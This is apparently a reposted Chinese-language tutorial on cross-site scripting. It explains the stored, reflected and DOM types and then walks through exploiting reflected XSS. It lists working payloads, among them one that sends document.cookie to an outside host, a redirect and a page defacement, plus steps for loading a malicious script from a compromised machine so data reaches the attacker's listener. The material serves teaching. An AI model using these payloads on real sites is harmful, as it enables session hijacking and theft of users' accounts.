XSS 跨站腳本檢測,常見攻擊手段——反射型


    簡而言之,XSS就是黑客通過利用web服務器漏洞從而向我們的客戶端瀏覽器發送惡意代碼,客戶端進而執行惡意代碼(javascript等腳本語言),向黑客發送有關自己的信息(盜取cookie,重定向等等)
 
XSS漏洞類型:
存儲:攻擊腳本會被永久的保存在目標服務器的數據庫或者文件中(黑客會在某論壇進行留言,此時論壇對應的服務器會將黑客的留言保存在服務器,但是留言的內容有XSS惡意代碼攻擊,當其他用戶訪問此留言回帖時,瀏覽器就會執行XSS惡意代碼)
 
反射:黑客先將含有XSS代碼的惡意鏈接郵件發送給目標用戶,用戶打開后,會訪問鏈接對應的服務器,服務器收到鏈接請求時,會將帶有的XSS代碼的數據再次發送給用戶,此時用戶瀏覽器就會默認執行帶有XSS代碼的腳本,此時會觸發XSS漏洞,不過在這個過程中,黑客先確認發給某個服務器,服務器會給黑客返回發送的數據
 
DOM型:直接在瀏覽器端進行惡意代碼的執行,不會向服務器發請求,可以說DOM型是一種特殊的反射型
 
 
反射型XSS攻擊:
發現:我們在目標站點提交數據,如果目標服務器返回的數據是源數據,或者源數據的片段,我們就可以懷疑其有反射型漏洞利用空間,類似於:
可以在burp中截斷查看
發現123在返回的數據中沒有進行任何過濾,這樣我們就可以進行XSS利用
通過彈窗可以驗證XSS漏洞可以利用
 
可以利用poc有:
• <script>alert(‘xss’)</script>
• <a href='' onclick=alert('xss')>type</a>
• <img src=http://1.1.1.1/a.jpg onerror=alert('xss')>
• <script>window.location=‘http://192.168.1.1'</script>
• <iframe SRC="http://1.1.1.1/a.jpg" height = "0" width ="0"></iframe>
• <script>new Image().src="http://1.1.1.1/c.php?output="+document.cookie;</script>
對於此條,我們可以驗證,先將kali的80端口進行監聽,然后在主機訪問IP是kali機器的80端口,利用XSS漏洞將我們瀏覽器的cookie信息進行傳輸如下:
主機:
kali:
如果在kali 機器修改cookie值就可以登錄目標站點
• <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS
WEBSITE IS UNDER ATTACK</h1></div>";</script> (修改頁面)
 
但是在大多數時候,黑客不可能將大量的攻擊代碼發送至受害者瀏覽器,黑客可能會利用第三方服務器,讓受害者去第三方服務器下載js代碼,從而執行,而XSS利用的地方則是第三方服務器保存的JS代碼地址,我們需要做的就是 1.將惡意js腳本放在肉機上,肉雞的腳本內容我們可以設置竊密內容發送到我們機器,而 。 2.在受害者機器上點擊js腳本下載,js腳本默認會去肉雞下載,從而執行
下面為步驟圖:
1.編寫js腳本,開啟apache服務,監聽開啟端口
在肉機上:
var/www/html/目錄下創建並編寫js腳本
開啟apache2服務 service apache2 start
 
在我們機器上開啟監聽88端口:
 
2.在客戶端進行XSS漏洞利用
具體內容:<script src= http://192.168.126.134:8080/a.js></script> 這里的IP地址為存放js腳本肉雞的IP,而js里面的內容則是我們機器的IP,也意為,客戶端會向js腳本內容里面的IP發送數據
 
3.在我們機器進行查看是否利用成功(剛剛是處於監聽狀態)
掌握好三方之間的關系,漏洞利用成功
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM